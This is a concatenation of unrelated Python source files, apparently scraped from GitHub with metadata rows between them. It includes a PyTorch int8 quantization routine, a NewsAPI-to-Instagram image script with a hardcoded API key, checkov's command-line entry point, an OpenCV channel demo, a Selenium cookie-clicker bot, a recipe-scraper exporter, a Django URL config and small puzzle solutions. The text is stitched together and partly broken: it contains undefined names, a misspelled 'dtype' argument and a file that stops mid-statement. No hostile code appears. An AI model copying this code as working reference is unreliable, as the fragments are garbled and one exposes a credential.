# temp = np.zeros((data.shape[0], data.shape[1], Csize, data.shape[3]))
# temp[:,:,0:data.shape[2],:] = data
# data = temp
if len(data.shape) == 4:
# for the conv weight
F1, F2, C, N = data.shape
elif len(data.shape) == 1:
# for the conv bias
N = data.shape[0]
result.extend(data)
if N % Ksize:
result.extend(np.zeros(Ksize - (N % Ksize), dtype=np.int8))
return result
else:
print('Weight shape not correct')
return None
flag = False
if C ==1:
data.permute(0,1,3,2)
F1, F2, C, N = data.shape
flag = True
Cleft = C
Nleft = N
Cidx = 0
Nidx = 0
CC = Csize
while Nleft > 0:
if Nleft < Ksize:
KK = Nleft
else:
KK = Ksize
Cleft = C
Cidx = 0
while Cleft > 0:
if Cleft > Csize:
CC = Csize
else:
CC = Cleft
for f1 in range(F1):
for f2 in range(F2):
for k in range(KK):
# result.extend(np.int8(data[f1, f2, Cidx:Cidx + CC, k + Nidx]))
result.extend(data[f1, f2, Cidx:Cidx + CC, k + Nidx])
# print('offset:', f1, f2, Cidx, k+Nidx)
if flag == True:
pass
else:
if CC < Csize:
result.extend(np.zeros(Csize - CC, dtype=np.int8))
if (KK < Ksize):
result.extend(np.zeros((Ksize - KK) * Csize, dtype=np.int8))
Cleft -= Csize
Cidx += CC
Nleft = Nleft - Ksize
Nidx += KK
return result
aaa = cal_l()
def cal_layer():
string = aaa()
wr_str(string)
def shift(M):
for i in range(-32, 32):
if M >= 2 ** (-i):
return 2 ** (-i)
break
def add_scale(M):
for i in range(-32,32):
if M >= 2 ** (-i):
if np.abs( M - 2**(-i) ) > np.abs( M - 2**(-i+1) ): # 上一个
return 2**(-i+1)
else:
return 2**(-i)
def M2scale(M):
thre = 0.1
for i in range(-32,32):
if M >= 2 ** (-i):
if np.abs( M - 2**(-i) ) > np.abs( M - 2**(-i+1) ): # 上一个
if ( np.abs(2 ** (-i+1) -M) / M > thre ) :
aaa1 = shift(M)
aaa2 = shift(M- aaa1)
aaa3 = shift(M -aaa1 -aaa2)
if (np.abs( M - aaa1 -aaa2-aaa3 ) > np.abs( M - 2**(-i+1) )):
ll = []
ll.append(2**(-i+1))
ll.append(False)
return ll # loss 小
else:
ll = []
ll.append( aaa1 + aaa2 + aaa3 )
ll.append(True)
return ll # loss 小
else:
ll = []
ll.append(2 ** ( -i + 1))
ll.append(False)
return ll # loss 小
else:
if ( np.abs(2 ** (-i) -M) / M > thre ) :
aaa1 = shift(M)
aaa2 = shift(M- aaa1)
aaa3 = shift(M -aaa1 -aaa2)
if (np.abs( M - aaa1 -aaa2-aaa3 ) > np.abs( M - 2**(-i) )):
ll = []
ll.append(2**(-i))
ll.append(False)
return ll # loss 小
else:
ll = []
ll.append( aaa1 + aaa2 + aaa3 )
ll.append(True)
return ll # loss 小
else:
ll = []
ll.append( 2 ** ( -i) )
ll.append(False)
return ll # loss 小
break
def M2scale_TSME(M):
for i in range(-32,0):
if M <= 2 ** (i):
shift1 = i-1
cpu2 = np.floor((M / 2**(i-1)) * 2 **(6))
print(shift1, 2**(i-1),cpu2)
return -1*shift1, 2**(i-1), cpu2
def conv_jit(input, weight_int, bias_float, weight, bias, self_M, inp, oup, stride, padding, groups, scale, zp):
aaa = nn.Conv2d(inp, oup, 3, stride, padding, groups=groups, bias=True)
aaa.weight = torch.nn.Parameter(torch.tensor(np.array(weight).astype(np.float32)))
#aaa.bias = torch.nn.Parameter(torch.zeros_like(torch.tensor(np.array(bias).astype(np.float32))))
#aaa.bias = torch.nn.Parameter(torch.tensor(np.array(bias).astype(np.float32)))
aaa.bias = torch.nn.Parameter(torch.tensor(np.array(bias).astype(np.float32)))
input_ = np.array(input.int_repr()*1.0).astype(np.float32) - np.array(input.q_zero_point()).astype(np.float32)
res = aaa( torch.tensor(input_))
res = res.detach().numpy()
M = M2scale(self_M)
#if ( (self_M - M[0])/self_M) > 0.1:
# pdb.set_trace()
#print('##################', M[0], self_M, (self_M - M[0])/self_M, (self_M - M[0])/M[0] )
#if M[1]:
# print('$$$$$$$$$$$$$ counting $$$$$$$$$$$$$$')
#res = res * M[0]
res = res * self_M
res = np.floor(res)
res = res + zp # add ly
#res[res>120] = 0
res = np.floor(np.clip(res, -128, 127))
#对齐格式
res = res.astype(np.float32)
res = torch.tensor(scale * (res - zp))
res1 = torch.quantize_per_tensor(res ,scale = scale , zero_point = zp, dtype = torch.qint8)
# float
aaa = nn.Conv2d(inp, oup, 3, stride, padding, groups=groups, bias=True)
input_ = (np.array(input.int_repr()).astype(np.float32) - input.q_zero_point())*input.q_scale()
weight_ = (np.array(weight_int.int_repr()).astype(np.float32)- weight_int.q_zero_point()).astype(np.float32) * weight_int.q_scale()
aaa.weight = torch.nn.Parameter(torch.tensor(np.array(weight_)))
#aaa.bias = torch.nn.Parameter(torch.zeros_like(torch.tensor(np.array(bias_float))))
aaa.bias = torch.nn.Parameter(torch.tensor(np.array(bias_float)))
res = aaa(torch.tensor(input_))
res = res.detach().numpy()
#对齐格式
res = torch.tensor(res)
res2 = torch.quantize_per_tensor(res, scale = scale , zero_point = zp, dtype = torch.qint8)
#finish
err = (np.array(res1.int_repr()).astype(np.float32) - np.array(res2.int_repr()).astype(np.float32)).max()
#err1 = (ori - np.array(res2.int_repr()).astype(np.float32) ).max()
return res1, res2
def conv_jit2(input, weight_int, bias_float, weight, bias, self_M, inp, oup, stride, padding, groups, scale, zp):
aaa = nn.Conv2d(inp, oup, 3, stride, padding, groups=groups, bias=True)
aaa.weight = torch.nn.Parameter(torch.tensor(np.array(weight).astype(np.float32)))
aaa.bias = torch.nn.Parameter(torch.tensor(np.array(bias).astype(np.float32)))
input_ = np.array(input.int_repr()*1.0).astype(np.float32) - np.array(input.q_zero_point()).astype(np.float32)
res = aaa( torch.tensor(input_))
bbb = nn.Conv2d(inp, oup, 3, stride, padding, groups=groups, bias=True)
bbb.weight = torch.nn.Parameter(torch.tensor(np.array(weight).astype(np.float32)))
# aaa.bias = torch.nn.Parameter(torch.zeros_like(torch.tensor(np.array(bias).astype(np.float32))))
# aaa.bias = torch.nn.Parameter(torch.tensor(np.array(bias).astype(np.float32)))
bbb.bias = torch.nn.Parameter(torch.tensor(np.array(bias).astype(np.float32)))
input_ = np.array(input.int_repr() * 1.0).astype(np.float32)# - np.array(input.q_zero_point()).astype(np.float32)
# input_ = np.array(input.int_repr() ).astype(np.float32)
res_b = bbb(torch.tensor(input_))
diff = res.detach().numpy() - res_b.detach().numpy()
'''
#res是直接的卷积输出,res_b是 input和weight的卷积
ccc = nn.Conv2d(inp, oup, 3, stride, padding, groups=groups, bias=True)
ccc.weight = torch.nn.Parameter(torch.tensor(np.array(weight).astype(np.float32)))
ccc.bias = torch.nn.Parameter(torch.tensor(np.array(bias+diff[0,:,10,10]).astype(np.float32)))
input_ = np.array(input.int_repr()*1.0).astype(np.float32) # - np.array(input.q_zero_point()).astype(np.float32)
#input_ = np.array(input.int_repr() ).astype(np.float32)
res_c = ccc( torch.tensor(input_))
'''
ddd = nn.Conv2d(inp, oup, 3, stride, padding, groups=groups, bias=True)
ddd.weight = torch.nn.Parameter(torch.tensor(np.array(weight).astype(np.float32)))
ddd.bias = torch.nn.Parameter(torch.tensor(np.array(np.floor(bias+diff[0,:,3,3]+zp/self_M)).astype(np.float32))) #
input_ = np.array(input.int_repr()*1.0).astype(np.float32)
res_d = ddd( torch.tensor(input_))
res_d = res_d.detach().numpy()
shift1, shift_cal, cpu2 = M2scale_TSME(self_M)
res_d = np.floor( res_d * shift_cal )
res_d = np.floor(res_d)
res_d = res_d * cpu2/2**(6)
res_d = np.floor(res_d)
res = res.detach().numpy()
#res = res * M[0]
res = res * self_M
res = np.floor(res)
res = res + zp # add ly
#res[res>120] = 0
res = np.floor(np.clip(res, -128, 127))
res_d = np.floor(np.clip(res_d, -128, 127))
now = time.strftime("%Y-%m-%d-%H_%M_%S",time.localtime(time.time()))
t = time.time()
now = str(int(round(t * 1000000)))
np.save('./layer_output_time/' + 'm' + now + '_conv_0_layer_weight_int8' + '.npy', weight)
np.save('./layer_output_time/' + 'm' + now + '_conv_1_layer_weight_scale' + '.npy', weight_int.q_scale())
np.save('./layer_output_time/' + 'm' + now + '_conv_2_layer_weight_zero_point' + '.npy', weight_int.q_zero_point())
np.save('./layer_output_time/' + 'm' + now + '_conv_3_layer_input_int8' + '.npy', input_)
np.save('./layer_output_time/' + 'm' + now + '_conv_4_layer_input_scale' + '.npy', input.q_scale())
np.save('./layer_output_time/' + 'm' + now + '_conv_5_layer_input_zero_point' + '.npy', input.q_zero_point())
np.save('./layer_output_time/' + 'm' + now + '_conv_6_layer_self_M_shift' + '.npy', shift1)
np.save('./layer_output_time/' + 'm' + now + '_conv_7_layer_self_M_cal' + '.npy', shift_cal)
np.save('./layer_output_time/' + 'm' + now + '_conv_8_layer_self_M_cpu' + '.npy', cpu2)
np.save('./layer_output_time/' + 'm' + now + '_conv_9_layer_bias_int32' + '.npy', np.floor(bias+diff[0,:,3,3]+zp/self_M))
np.save('./layer_output_time/' + 'm' + now + '_conv_A_layer_output_int8' + '.npy', res_d)
np.save('./layer_output_time/' + 'm' + now + '_conv_B_layer_out_scale' + '.npy', scale)
np.save('./layer_output_time/' + 'm' + now + '_conv_C_layer_out_zero_point' + '.npy', zp)
np.save('./layer_output_time/' + 'm' + now + '_conv_D_layer_stride' + '.npy', stride)
weight_ser = serializeWeight(weight.permute(2,3,1,0))
write_weight_b(weight_ser, np.floor(bias+diff[0,:,3,3]+zp/self_M))
#对齐格式
res = res.astype(np.float32)
res = torch.tensor(scale * (res - zp))
res1 = torch.quantize_per_tensor(res ,scale = scale , zero_point = zp, dtype = torch.qint8)
res_d = res_d.astype(np.float32)
res_d = torch.tensor(scale * (res_d - zp))
res_d = torch.quantize_per_tensor(res_d, scale=scale, zero_point=zp, dtype=torch.qint8)
return res_d | poyue0221/Learing_me | Pytorch_Retinaface/quanzition_windows/at5k_1/qconv2d.py | qconv2d.py | py | 12,163 | python | en | code | 1 | github-code | 90 |
30095652501 | from PIL import Image, ImageFont, ImageDraw
from newsapi import NewsApiClient
import requests
from io import BytesIO
import os
import time
import sys
import textwrap
import math
def createStory1(img, title, desc, url):
imgWidth = img.width
imgHeight = img.height
fontsFolder = 'FONT_FOLDER'
# Windows
arialFont = ImageFont.truetype(os.path.join(fontsFolder, 'arial.ttf'), math.ceil(imgWidth / imgHeight) * 25)
arialFontsM = ImageFont.truetype(os.path.join(fontsFolder, 'arial.ttf'), math.ceil(imgWidth / imgHeight) * 25)
# Mac
# arialFont = ImageFont.truetype('/Library/Fonts/Arial.ttf', math.ceil(imgWidth / imgHeight) * 25)
# arialFontsM = ImageFont.truetype('/Library/Fonts/Arial.ttf', math.ceil(imgWidth / imgHeight) * 25)
draw = ImageDraw.Draw(img)
# design idea for TAMU branding purposes
draw.rectangle((0, 0, 35, 360), fill=(0,60,113))
draw.rectangle((0, 360, 35, 720), fill=(91,98,54))
draw.rectangle((0, 720, 35, 1080), fill=(116,79,40))
# article title background
draw.rectangle((60, 60, 610, 120), fill="black")
# article title
draw.rectangle((50, 50, 600, 110), fill="white")
# title text
draw.text((60, 50), "\n".join(textwrap.wrap(title, width=45)), fill='black', font=arialFont)
# article desc background
draw.rectangle((210, 450, 600, 650), fill="black")
# article desc
draw.rectangle((200, 440, 590, 640), fill="white")
# desc text
draw.text((210, 440), "\n".join(textwrap.wrap(desc, width=30)), fill='black', font=arialFontsM)
# article url background
draw.rectangle((60, 1010, 610, 1070), fill="black")
# article url
draw.rectangle((50, 1000, 600, 1060), fill="white")
# url text
draw.text((60, 1000), "\n".join(textwrap.wrap(url, width=45)), fill='black', font=arialFontsM)
return img
def createStory2(im, artIm, t, d, url):
im.paste(artIm, (100,625))
draw = ImageDraw.Draw(im)
# backgroundImg = ImageDraw.resize(newSize)
fontsFolder = 'FONT_FOLDER'
arialFont = ImageFont.truetype(os.path.join(fontsFolder, 'arial.ttf'), 60)
# arialFont = ImageFont.truetype('/Library/Fonts/Arial.ttf', 60)
arialFontsM = ImageFont.truetype(os.path.join(fontsFolder, 'arial.ttf'), 50)
# arialFontsM = ImageFont.truetype('/Library/Fonts/Arial.ttf', 50)
draw.text((100, im.height/6), "\n".join(textwrap.wrap(t, width=45)), fill='white', font=arialFont)
# draw.text((100, 1500), "\n".join(textwrap.wrap(frontA, width=45)), fill='white', font=arialFontsM)
# draw.text((100, 1600), "\n".join(textwrap.wrap(backA, width=45)), fill='white', font=arialFontsM)
draw.multiline_text((100, 1500), "\n".join(textwrap.wrap(d, width=50)), fill='white', spacing=15,font=arialFontsM)
draw.text((100, 2200), "\n".join(textwrap.wrap(url, width=50)), fill='white', font=arialFontsM)
return im
def createImage(topic, loc, backgroundPath):
sys.tracebacklimit = 0
location = loc - 1
newsapi = NewsApiClient(api_key='87f90668eabb44b98fa88a4f007804b5')
# articleTopic = input('Enter Topic:')
all_articles = newsapi.get_everything(q=topic)
# potentially play around w/ img resize to get uniform dimensions
u = all_articles['articles'][location]['urlToImage']
t = all_articles['articles'][location]['title']
d = all_articles['articles'][location]['description']
url = all_articles['articles'][location]['url']
response = requests.get(u)
img = Image.open(BytesIO(response.content)) # article image
im = Image.open('static/backgrounds/' + backgroundPath) # background image
storyImg = im
if(backgroundPath == "articlepic.png"):
storyImg = createStory1(im, t, d, url)
else:
storyImg = createStory2(im, img, t, d, url)
new_name = "topic2instagram" + str(time.time()) + ".png"
for filename in os.listdir('static/'):
if filename.startswith('topic2instagram'): # not to remove other images
os.remove('static/' + filename)
storyImg.save('static/' + new_name)
return new_name | PablooogiN/Story2Instagram | topicToStory.py | topicToStory.py | py | 4,096 | python | en | code | 0 | github-code | 90 |
42368220590 | #!/usr/bin/env python
import atexit
import argparse
import os
import shutil
from pathlib import Path
from checkov.arm.runner import Runner as arm_runner
from checkov.cloudformation.runner import Runner as cfn_runner
from checkov.common.bridgecrew.platform_integration import bc_integration
from checkov.common.goget.github.get_git import GitGetter
from checkov.common.runners.runner_registry import RunnerRegistry, OUTPUT_CHOICES
from checkov.common.util.banner import banner as checkov_banner
from checkov.common.util.consts import DEFAULT_EXTERNAL_MODULES_DIR
from checkov.common.util.docs_generator import print_checks
from checkov.common.util.type_forcers import convert_str_to_bool
from checkov.kubernetes.runner import Runner as k8_runner
from checkov.logging_init import init as logging_init
from checkov.runner_filter import RunnerFilter
from checkov.serverless.runner import Runner as sls_runner
from checkov.terraform.plan_runner import Runner as tf_plan_runner
from checkov.terraform.runner import Runner as tf_runner
from checkov.version import version
outer_registry = None
logging_init()
def run(banner=checkov_banner):
parser = argparse.ArgumentParser(description='Infrastructure as code static analysis')
add_parser_args(parser)
args = parser.parse_args()
runner_filter = RunnerFilter(framework=args.framework, checks=args.check, skip_checks=args.skip_check,
download_external_modules=convert_str_to_bool(args.download_external_modules),
external_modules_download_path=args.external_modules_download_path,
evaluate_variables=convert_str_to_bool(args.evaluate_variables))
if outer_registry:
runner_registry = outer_registry
runner_registry.runner_filter = runner_filter
else:
runner_registry = RunnerRegistry(banner, runner_filter, tf_runner(), cfn_runner(), k8_runner(), sls_runner(),
arm_runner(), tf_plan_runner())
if args.version:
print(version)
return
if args.bc_api_key:
if args.repo_id is None:
parser.error("--repo-id argument is required when using --bc-api-key")
if len(args.repo_id.split('/')) != 2:
parser.error("--repo-id argument format should be 'organization/repository_name' E.g "
"bridgecrewio/checkov")
bc_integration.setup_bridgecrew_credentials(bc_api_key=args.bc_api_key, repo_id=args.repo_id)
guidelines = {}
if not args.no_guide:
guidelines = bc_integration.get_guidelines()
if args.check and args.skip_check:
parser.error("--check and --skip-check can not be applied together. please use only one of them")
return
if args.list:
print_checks(framework=args.framework)
return
external_checks_dir = get_external_checks_dir(args)
if args.directory:
for root_folder in args.directory:
file = args.file
scan_reports = runner_registry.run(root_folder=root_folder, external_checks_dir=external_checks_dir,
files=file, guidelines=guidelines)
if bc_integration.is_integration_configured():
bc_integration.persist_repository(root_folder)
bc_integration.persist_scan_results(scan_reports)
bc_integration.commit_repository(args.branch)
runner_registry.print_reports(scan_reports, args)
return
elif args.file:
scan_reports = runner_registry.run(external_checks_dir=external_checks_dir, files=args.file,
guidelines=guidelines)
if bc_integration.is_integration_configured():
files = [os.path.abspath(file) for file in args.file]
root_folder = os.path.split(os.path.commonprefix(files))[0]
bc_integration.persist_repository(root_folder)
bc_integration.persist_scan_results(scan_reports)
bc_integration.commit_repository(args.branch)
runner_registry.print_reports(scan_reports, args)
else:
print(f"{banner}")
bc_integration.onboarding()
def add_parser_args(parser):
parser.add_argument('-v', '--version',
help='version', action='store_true')
parser.add_argument('-d', '--directory', action='append',
help='IaC root directory (can not be used together with --file).')
parser.add_argument('-f', '--file', action='append',
help='IaC file(can not be used together with --directory)')
parser.add_argument('--external-checks-dir', action='append',
help='Directory for custom checks to be loaded. Can be repeated')
parser.add_argument('--external-checks-git', action='append',
help='Github url of external checks to be added. \n you can specify a subdirectory after a '
'double-slash //. \n cannot be used together with --external-checks-dir')
parser.add_argument('-l', '--list', help='List checks', action='store_true')
parser.add_argument('-o', '--output', nargs='?', choices=OUTPUT_CHOICES,
default='cli',
help='Report output format')
parser.add_argument('--no-guide', action='store_true',
default=False,
help='do not fetch bridgecrew guide in checkov output report')
parser.add_argument('--quiet', action='store_true',
default=False,
help='in case of CLI output, display only failed checks')
parser.add_argument('--framework', help='filter scan to run only on a specific infrastructure code frameworks',
choices=['cloudformation', 'terraform', 'terraform_plan', 'kubernetes', 'serverless', 'arm',
'all'],
default='all')
parser.add_argument('-c', '--check',
help='filter scan to run only on a specific check identifier(allowlist), You can '
'specify multiple checks separated by comma delimiter', default=None)
parser.add_argument('--skip-check',
help='filter scan to run on all check but a specific check identifier(denylist), You can '
'specify multiple checks separated by comma delimiter', default=None)
parser.add_argument('-s', '--soft-fail',
help='Runs checks but suppresses error code', action='store_true')
parser.add_argument('--bc-api-key', help='Bridgecrew API key')
parser.add_argument('--repo-id',
help='Identity string of the repository, with form <repo_owner>/<repo_name>')
parser.add_argument('-b', '--branch',
help="Selected branch of the persisted repository. Only has effect when using the --bc-api-key flag",
default='master')
parser.add_argument('--download-external-modules',
help="download external terraform modules from public git repositories and terraform registry",
default=False)
parser.add_argument('--external-modules-download-path',
help="set the path for the download external terraform modules",
default=DEFAULT_EXTERNAL_MODULES_DIR)
parser.add_argument('--evaluate-variables',
help="evaluate the values of variables and locals",
default=True)
def get_external_checks_dir(args):
external_checks_dir = args.external_checks_dir
if args.external_checks_git:
git_getter = GitGetter(args.external_checks_git[0])
external_checks_dir = [git_getter.get()]
atexit.register(shutil.rmtree, str(Path(external_checks_dir[0]).parent))
return external_checks_dir
if __name__ == '__main__':
run()
| jensskott/tf-compliance | venv/lib/python3.9/site-packages/checkov/main.py | main.py | py | 8,043 | python | en | code | 0 | github-code | 90 |
18324169539 | def main():
s = input()
arr = [0]*(len(s)+1)
for i in range(len(s)):
c = s[i]
if c == "<":
arr[i+1] = arr[i]+1
for i in reversed(range(len(s))):
c = s[i]
if c == ">":
arr[i] = max(arr[i], arr[i+1]+1)
print(sum(arr))
if __name__ == "__main__":
main()
| Aasthaengg/IBMdataset | Python_codes/p02873/s082946344.py | s082946344.py | py | 331 | python | en | code | 0 | github-code | 90 |
21461747880 | from django.conf.urls import url, include
from django.urls import path
from rest_framework import routers, serializers, viewsets
from .views import loginEndpoint, register, NotSeenRentOffersViewSet, ReactionsViewSet
router = routers.DefaultRouter()
router.register(
r"^api/rentoffers", NotSeenRentOffersViewSet, basename="NotSeenRentOffersViewSet"
)
router.register(r"^api/reactions", ReactionsViewSet, basename="ReactionsViewSet")
urlpatterns = [
url(r"^", include(router.urls)),
path("api/login", loginEndpoint),
path("api/register", register),
]
| MichalKarol/rent-tinder | backend/api/urls.py | urls.py | py | 567 | python | en | code | 0 | github-code | 90 |
18223558159 | import itertools
N, M, Q = map(int, input().split())
a = []
b = []
c = []
d = []
for q in range(Q):
aq, bq, cq, dq = map(int, input().split())
a.append(aq)
b.append(bq)
c.append(cq)
d.append(dq)
max_answer = 0
for A in itertools.combinations_with_replacement(range(1, M + 1), N):
# print(A)
answer = 0
for i in range(Q):
# print(a[i], b[i], c[i], d[i])
if A[b[i]-1] - A[a[i]-1] == c[i]:
answer += d[i]
# print(answer)
if max_answer < answer:
max_answer = answer
print(max_answer) | Aasthaengg/IBMdataset | Python_codes/p02695/s418689100.py | s418689100.py | py | 556 | python | en | code | 0 | github-code | 90 |
27195848568 | """ 1. WAP to remove all the duplicate elements in the list """
# names = ['apple', "google", "apple", "yahoo", "google"]
# l = []
# Method 1:
# for element in names:
# if element not in l:
# l.append(element)
#
# print(l) # ['apple', 'google', 'yahoo']
# Method 2:
# for element in names:
# if names.count(element) == 1:
# l.append(element)
#
# print(l) # ['yahoo']
# Method 3: by using set()
# print(set(names)) # {'apple', 'google', 'yahoo'}
""" 2. WAP to print all numeric values in a list """
# items = ['apple', 1.2, "google", "12.6", 26, "734"]
# Method 1: by using comprehension
# list_ = [item for item in items if isinstance(item, (int, float, complex))]
# print(list_)
# Method 2:
# l = []
# for element in items:
# if isinstance(element, (int, float, complex)):
# l.append(element)
#
# print(l)
""" 3. WAP to sum all even numbers in the given string """
# sentence = "hello 123 world 567 welcome to 9724 python"
# sum_ = 0
# # Method 1:
# for char in sentence:
# if char.isdigit() and int(char) % 2 == 0:
# sum_ += int(char)
#
# print(f"Sum of all even numbers are {sum_}")
""" 4. WAP to create a list with all the languages which starts with "p" or "P" """
# languages = ["Python", "Java", "Perl", "PHP", "python", "JS", "c++", "JS", "python", "ruby"]
#
# # by using list comprehension:
# l = [element for element in languages if element[0] in "pP"]
# print(l)
""" 4.1 WAP to create a set with all the languages which starts with "p" or "P" """
# languages = ["Python", "Java", "Perl", "PHP", "python", "JS", "c++", "JS", "python", "ruby"]
#
# # Method 1: by using set comprehension:
# set_ = {element for element in languages if element[0] in "pP"}
# print(set_)
#
# # Method 2:
# set_ = set()
#
# for item in languages:
# if item[0] in "pP": # if item[0].lower() in "p":
# set_.add(item)
#
# print(set_)
""" 5. Build a list with only even length string """
# names = ["apple", "google", "yahoo", "facebook", "yelp", "flipkart", "gmail", "instagram", "microsoft"]
#
# # method 1: using list comprehension
# print([item for item in names if len(item) % 2 == 0])
""" 6. Reverse the item of a list if the item is of odd length string otherwise keep the item as it is """
# names = ["apple", "google", "yahoo", "facebook", "yelp", "flipkart", "gmail", "instagram", "microsoft"]
# # Method 1: by using comprehension
# print([word[::-1] if len(word) % 2 != 0 else word for word in names])
# print([word if len(word) % 2 == 0 else word[::-1] for word in names])
#
# # Method 2:
# l = []
# for word in names:
# if len(word) % 2 == 0:
# l.append(word)
# else:
# l.append(word[::-1])
# print(l)
""" 7. WAP to print the sum of entire list and sum of only internal list """
# l = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
#
# entire_sum = 0
#
# for item in l: # [1, 2, 3], [4, 5, 6], [7, 8, 9]
# internal_sum = 0
# for i in item: # (1, 2, 3), (4, 5, 6)
# internal_sum += i
# entire_sum += i # 0+1= 1, 1+2= 3, 3+3=6, 6+4=10, 10+5=15, 15+6= 21
# print(f'Sum of internal list {internal_sum}')
# print(f'Sum of entire list --> {entire_sum}') # 6 + 15 + 24 = 45
""" 8. WAP to print list of Prime numbers between 1 - 100 """
# # Method 1:
# for num in range(1, 101):
# if num > 1:
# for i in range(2, num):
# if num % i == 0:
# break
# else:
# print(num, end=" ")
# print()
#
# # Method 2: Store inside a list
# l = []
# for num in range(1, 101):
# if num > 1:
# for i in range(2, num):
# if num % i == 0:
# break
# else:
# l.append(num)
#
# print(l)
""" 9. WAP to reverse the list as below """
# words = ["hi", "hello", "pytho"]
# # output = ['nohtyp', 'olleh', 'ih']
#
# # Method 1: by using reversed()
# print([word[::-1] for word in reversed(words)])
#
# # Method 2: by using range()
# print([words[index][::-1] for index in range(len(words)-1, -1, -1)])
#
# # Method 3: by using slicing
# print([word[::-1] for word in words[::-1]])
""" 10. WAP to rotate item of the list """
item = ['apple', 1.2, 'google', "12.6", 26, '100']
k = 2
# output = [26, '100', 'apple', 1.2, 'google', '12.6']
# Method 1: by using while loop
# i = 1
#
# while i <= k:
# *n1, n2 = item
# item = n2, *n1
# i += 1
#
# print(item)
# Method 2: **********************************************************
# for i in range(k):
# remove_element = item.pop()
# item.insert(0, remove_element)
#
# print(item) | njmujawar/selenium_practise | Sau_/Assesments/Assesment 2 (List).py | Assesment 2 (List).py | py | 4,624 | python | en | code | 0 | github-code | 90 |
7905818289 | from . import log
from sqlalchemy import exists
class Exporter(object):
def exists(self, url):
raise NotImplementedError
def add(self, recipe):
raise NotImplementedError
class SQLAlchemyExporter(object):
"""
A class for exporting recipes to an sql alchemy database.
Pass in the db instance, recipe model and ingredients model
and use add_recipe to add Recipe objects to the database.
"""
def __init__(self, db, recipe_model, ingredients_model, upload_image):
self.db = db
self.recipe_model = recipe_model
self.ingredients_model = ingredients_model
self.upload_image = upload_image
def exists(self, url):
return self.db.session.query(exists().where(
self.recipe_model.url == url)).scalar()
def add(self, recipe):
log.info('Adding recipe {} to db'.format(recipe.url))
try:
image = self.upload_image(recipe.image_file)
except IOError:
log.error(
"Couldn't load image for recipe:{}".format(recipe.url))
image = None
if self.exists(recipe.url):
return
rmodel = self.recipe_model()
for attrib in ('url',
'name',
'author',
'recipe_yield',
'recipe_category',
'recipe_cuisine',
'cook_time',
'prep_time',
'total_time'):
setattr(rmodel, attrib,
getattr(recipe, attrib))
rmodel.ingredients = [
self.ingredients_model(name=ingr) for
ingr in recipe.ingredients]
rmodel.image = image
self.db.session.merge(rmodel)
self.db.session.commit()
def scrape_and_export(exporter, *crawlers):
crawlers = [c(exporter) for c in crawlers]
for crawler in crawlers:
for recipe in crawler.crawl():
exporter.add(recipe)
| steinitzu/recipe_scrapers | recipe_scrapers/export.py | export.py | py | 2,020 | python | en | code | 0 | github-code | 90 |
5618869141 | import numpy as np
import argparse
# 构造解析函数 包? 外部导入图片的包
import cv2
# 用恐龙做这个真的看不出什么
ap = argparse.ArgumentParser()
ap.add_argument("-i","--image",required=True,
help = " Path to the image")
args = vars(ap.parse_args())
# 加载图像 并且抓取每一个通道
image = cv2.imread(args["image"])
(B,G,R) = cv2.split(image) #numpy 把它倒过来了 ,正确排序应该是 RGB
# 这个函数应该是把它 R G B 分离出来
cv2.imshow("Red",R)
cv2.imshow("Green",G)
cv2.imshow("Blue",B)
cv2.waitKey(0)
# 重新合并图像
merged = cv2.merge([B,G,R]) # Numpy 是倒的
cv2.imshow("Merged",merged)
cv2.waitKey(0)
cv2.destroyAllWindows()
# 现在我们以每个颜色显示通道
zeros = np.zeros(image.shape[:2],dytpe = "uint8")
cv2.imshow("Red",cv2.merge([zeros,zeros,R]))
cv2.imshow("Rred",cv2.merge([zeros,G,zeros]))
cv2.imshow("Blue",cv2.merge([B,zeros,zeros]))
cv2.waitKey(0) | Chentao2000/practice_code | Python_OpenCV/(Practical-Python-and-OpenCV_book1)/ch6/6_22_splitting_and_merging.py | 6_22_splitting_and_merging.py | py | 959 | python | zh | code | 0 | github-code | 90 |
35219691009 | from itertools import permutations
n = int(input())
a = list(map(int, input().split()))
from copy import deepcopy
a1 = deepcopy(a)
a1.sort()
p = []
for i in range(n):
idx = a1.index(a[i])
p.append(idx)
a1[idx] = -1
print(*p)
| yongwoo97/algorithm | silver/1015_수열 정렬.py | 1015_수열 정렬.py | py | 241 | python | en | code | 0 | github-code | 90 |
34716157901 | from selenium import webdriver
from selenium.webdriver.common.by import By
import time
chrome_driver_path = "/Users/huangshihao/Development/chromedriver"
driver = webdriver.Chrome(executable_path=chrome_driver_path)
driver.get("http://orteil.dashnet.org/experiments/cookie/")
count = 0
# grandma_value = driver.find_element(By.CSS_SELECTOR,"#buyGrandma b")
# print(grandma_value.text.split()[2])
timeout = time.time() + 60
nowtime = time.time() + 5
addfuncs = driver.find_element(By.ID,"store")
def add_funcs():
addfuncs_list = [int(item.split()[-1].replace(',','')) for i, item in enumerate(addfuncs.text.split("\n")) if "-" in item]
return addfuncs_list
def find_max(money, fun_list):
for item in fun_list:
if money < item:
item_index = fun_list.index(item) - 1
return fun_list[item_index], item_index
def find_id_name(id):
if id == 0:
return "buyCursor"
elif id == 1:
return "buyGrandma"
elif id == 2:
return "buyFactory"
elif id == 3:
return "buyMine"
elif id == 4:
return "buyShipment"
elif id == 5:
return "buyAlchemy lab"
elif id == 6:
return "buyPortal"
elif id == 7:
return "buyTime machine"
else:
return "buyElder Pledge"
while True:
#time.sleep(0.1)
cookie_click = driver.find_element(By.XPATH,'//*[@id="cookie"]')
cookie_click.click()
count += 1
if time.time() > nowtime:
test_list = add_funcs()
print(test_list)
cookies_num = driver.find_element(By.ID,"money")
cookies_num = int(cookies_num.text.replace(',',''))
cost, cost_index = find_max(money=cookies_num,fun_list=test_list)
id_name = find_id_name(cost_index)
print(cost_index)
click = driver.find_element(By.ID, id_name)
click.click()
nowtime = time.time() + 5
if time.time() > timeout:
break
driver.quit() | hao134/100_day_python | day48_selenium_webdriver_browser_and_game_playing_bot/clickcookie.py | clickcookie.py | py | 1,946 | python | en | code | 2 | github-code | 90 |
8257231743 | from datetime import timedelta as t
from datetime import datetime as d
def gi(h):
for k in range(2, h + 1):
if pr_fun(k):
pre.append(k)
def pr_fun(h):
if h <= 1:
return False
for k in range(2, h):
if h % k == 0:
return False
return True
dye, dwk, h = input().split()
h = int(h)
pre = []
gi(365)
dadic = {0: "Mon", 1: "Tue", 2: "Wed", 3: "Thu", 4: "Fri", 5: "Sat", 6: "Sun"}
dye = d.strptime(dye, "%Y%m%d")
das = -1
for k in pre:
dte = dye + t(k)
if pr_fun(dte.month) and dadic[dte.weekday()] == dwk:
das = k
break
if das == -1:
print("No", 0, end="")
elif das <= h:
